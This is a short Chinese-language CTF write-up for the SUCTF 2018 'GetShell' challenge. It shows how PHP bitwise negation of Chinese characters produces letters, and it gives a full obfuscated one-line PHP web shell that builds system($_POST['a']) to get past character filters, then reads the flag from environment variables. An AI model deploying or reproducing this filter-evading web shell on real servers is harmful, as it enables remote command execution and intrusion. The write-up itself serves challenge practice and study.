# [suctf2018]GetShell

参考 p 神利用取反来获取可用字符:

<?php
error_reporting(0);
$a = ~垂;
echo $a."\n";
echo $a[1];
/*
运行得:
a}
a
*/
?>

🐎一下汉字:

echo ~茉**[**$____**]**;//s

echo ~内**[**$____**]**;//y

echo ~茉**[**$____**]**;//s

echo ~苏**[**$____**]**;//t

echo ~的**[**$____**]**;//e

echo ~咩**[**$____**]**;//m

echo ~课**[**$____**]**;//P

echo ~尬**[**$____**]**;//O

echo ~笔**[**$____**]**;//S

echo ~端**[**$____**]**;//T

echo ~瞎**[**$____**]**;//a

构成🐎,POST 参数 a:

<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);

![1](…/images/[SUCTF 2018]GetShell/1.png)

# 用 env 访问环境变量获得 flag:

参考自:https://www.shawroot.cc/1856.html

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal